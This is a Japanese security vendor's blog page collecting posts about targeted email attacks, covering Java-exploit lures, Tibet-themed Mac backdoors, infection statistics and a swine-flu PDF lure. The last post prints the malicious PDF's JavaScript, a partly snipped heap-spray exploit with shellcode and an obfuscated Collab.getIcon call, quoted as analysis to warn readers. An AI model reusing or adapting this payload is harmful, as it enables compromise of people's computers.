エフセキュアブログ

標的型メール を含む記事

グリーティングカードを装った標的型メールに注意

グリーティングカードを装った標的型メールが複数確認されています。
実在するサービスなので、ついクリックしてしまいそうですのでご注意ください!

greeting_card

今回、確認したケースでは記載されたURLへアクセスしますと、CVE-2013-0422(Javaの脆弱性)を悪用する攻撃コードが実行される仕組みとなっていました。
Javaの脆弱性を狙った攻撃は今後も継続することが予想されますので、特に必要のないユーザはアンインストールしておいた方が妥当かもしれません。

ちなみに、ダウンロードされる攻撃コードはmetasploitにより作成された可能性があります。
metasploit用に開発された攻撃コードの多くは研究し尽くされていますので、標的型攻撃で利用されるのは珍しいケースだなぁ、と思いました。(広範囲に対しての攻撃だったのかもしれませんが。)
もしかすると、実験的な攻撃なのかもしれませんね。

jar


中国がチベット関連でNGOのMacを標的に

  「CVE-2011-3544」(Java脆弱性)を悪用する新たなMacバックドアが報告されている。このバックドアは、GhostNetにつながっているようだ。同マルウェアは、非政府組織(NGO)に対する標的型攻撃で使用されている。

  Greg Waltonが、NGOに送信されたチベット関連の標的型メールについて、詳細を発表した。同メッセージには「dns.assyra.com」へのテキストが含まれる。詳細はWaltonがここに書いている。AlienVault Labsのテクニカルレポートも掲載されている。

  今日のニュースで、我々のMacマルウェアアナリストの1人Brodが、Microsoftの「バックドアOlyx - はMac向けの任務を負うマルウェアか?」という記事を思い出した。この記事はMacとWindowsユーザをこの7月に標的とした、似たようなテーマの攻撃に関するものだ。

  我々はこれらの新しい脅威を、以下の物として検出している:

Exploit:Java/CVE-2011-3544.E — MD5: 6C8F0C055431808C1DF746F9D4BB8CB5, MD5: 453A3DC32E2FAFD39F837A1EBE62CA80
Backdoor:OSX/Olyx.B — MD5: 39084b60790ca3fdebe1cd93a4764819
Backdoor:W32/Poison.CE — MD5: 7F7CBC62C56AEC9CB351B6C1B1926265

  昨日のJava緩和策に関するMac関連記事も読んで欲しい。








ところで標的型メールってどのくらいくるの?

Googleの件で、改めて標的型攻撃が注目されています。しかも、IEのゼロデイが悪用されたとのことですので、狙われた企業はひとたまりもありません。しかも、標的を絞っての攻撃となると、一般に情報が公になるのが遅れますので、対策をうつ事すらできませんので非常に厄介です。

セキュリティ担当者の立場からしますと、「そんな攻撃は来てくれるな!」と祈るばかりです。では、この標的型メールとは、一体どの程度届くものなのでしょうか。
(私のところには、まだ日本語の標的型メールが届いたことが無いのでとても不満ちょっと残念です。)

そこで、昨年私の所属する研究所で調査した統計のデータを元にざっくり計算してみました。大体ですが、調査対象全PCに対して標的型メールから被害を受けたPCの率は約0.1%くらいでした。
#サンプル数が10社ですので、正確性に欠けますが、ご愛嬌ということで。。。

人数に換算すると、1万人規模の組織に対して、10人くらい。1000人規模であれば、1人の計算になります。しかし、これは統計情報ですのでそんなに都合よくいくわけがありません。

そこで、実際に被害に遭われている方々に聞いてみました。すると、どうやら一部の部署やチームに届いているようだ、とのことでした。
標的型メールのタイトルも色々あるそうで、昨年ですと、新型インフルエンザの注意喚起を装ったものや、打ち合せ議事録を装ったものさえあったそうです。
これは引っ掛かってしまいそうですよね!

特にGoogleは、知的財産が狙われたとのことですので、盗まれてマズい情報を持っている業種の方は注意が必要です。先ずは重要情報を管理しているサーバのセキュリティ対策を見直すところから初めては如何でしょうか。
#ちなみに、私の経験ではファイルサーバ関連は要注意です。

そうそう、全く話が変わりますが、明日からTBS系で「ブラッディ・マンデイ シーズン2」が始まりますね。
当研究所の茶パンダさん(本人希望でHN)を中心にハッキングシーンを作ってます。所々にコネタを入れているようですので、色々探してみて下さい。(編集でカットされている可能性大ですが・・・)
乞う、ご期待!

インフルエンザネタのMal PDF

新型インフルエンザをテーマにした標的型攻撃に関して。

Malicious PDF といえば、JSRedir-R(通称Genoウイルス)でも使われるなど、今旬な攻撃ですね。

他の手口では、先週私のボス宛のメールに添付されていました。内容は豚インフルエンザのネタの標的型メールです。カタコトの日本語の標題なのでそうそうクリックする人はいないと思いますが、一応注意しておく必要がありそうです。

Subject: 病人の行動路線,こ?注意なさい
MD5: 9137fec2f6a1b020cd877cebce8b8f67

ちなみに、添付されていたPDFに含まれるコードは次のようなものでした。

Exploitされますと、中国のサイトへ飛んでいきます。(´;ω;`)
var sc = unescape("%u5850%u5850%uEB90%u4022%u5A48%u5F52%u8B66%u800A"+ "%u30F9%u1A74%uE980%uC064%u04E1%uED80%u8064%u0FE5"+ "%uCD02%u0F88%u4242%uEB47%uE8E3%uFFD9%uFFFF"+

--- snip ---

"%u6F6C%u6864%u6F6C%u6764%u6970%u6F72%u6664%u6767"+ "%u6470%u6F6C%u6971%u7369%u7269%u7169%u6F69%u6670"+ "%u6C64%u6464%u6C72%u6464%u6464%u6464%u6464%u6C69"+ "%u676C%u6470%u6964%u6770%u3030"); function repeat(count,what){ var v = ""; while (--count >= 0) v += what; return v; } function myunescape(buf) { var ret=''; for (var x=0;x < buf.length; x+=2) { ret += util.byteToChar(Number('0x'+buf.substr(x,2))); } return ret; } function exploit() { blah = repeat(128, unescape("%u4141%u4141%u4141%u4141%u4141")) + sc; bigblock = unescape("%u4141%u4141"); headersize = 20; wap = headersize+blah.length; while (bigblock.length<0x40000) block = block+block+fillblock; mm = new Array(); for (i=0;i<200;i++) mm[i] = block + blah; of = repeat(4096, myunescape("0a0a0a0a")); var a=["\x5f\x4e\x2e\x62\x75\x6e\x64\x6c\x65"];Collab["\x67\x65\x74\x49\x63\x6f\x6e"](of+a[0x0]); } var inBrowser = this.external; if (inBrowser) var shaft = app.setTimeOut("exploit()",1200); else exploit();
バックナンバー
セキュリティ関連リンク
セキュリティ機関

政府関連

セキュリティ関連団体

研究機関・大学
詳細カテゴリ
メディア関係者の皆様へ
エフセキュアブログメンバー
エフセキュアブログメンバー
ミッコ・ヒッポネン
エフセキュア CRO(セキュリティ研究所主席研究員)(ヘルシンキ)
(Twitterアカウント)
(研究所Twitter)
ショーン・サリバン
エフセキュア セキュリティ・アドバイザー(ヘルシンキ)
(Twitterアカウント)
高間 剛典
メタ・アソシエイツ代表
(公式ブログ)
(Twitterアカウント)
星澤 裕二
株式会社セキュアブレイン 最高技術責任者
(公式ブログ)
(人物紹介)
岩井 博樹
デロイト トーマツ リスクサービス株式会社 (〜2013年3月 株式会社ラック) 情報セキュリティ大学院大学 客員研究員
(Twitterアカウント)

(人物紹介)
福森 大喜
株式会社サイバーディフェンス研究所 上級分析官
CDI-CIRTメンバー
(人物紹介)
鵜飼 裕司
株式会社FFRI 代表取締役社長
(人物紹介)
福本 佳成
楽天株式会社
執行役員
OWASP Japan
アドバイザリーボード
Rakuten-CERT representative
(人物紹介)
神田 貴雅
エフセキュア株式会社 プロダクトグループ 部長
富安 洋介
エフセキュア株式会社 プロダクトグループ
コーポレートセールスチーム
エフセキュア株式会社
(エフセキュアブログ公式Twitterアカウント)

海外記事翻訳
株式会社イメージズ・アンド・ワーズ
エフセキュアメールマガジン

ブログに載らないメルマガ限定情報や、技術者インタビュー、製品情報、技術解説を掲載して毎月一回配信します。アドレスのみの登録で購読無料。

エフセキュアブログQRコード
QRコード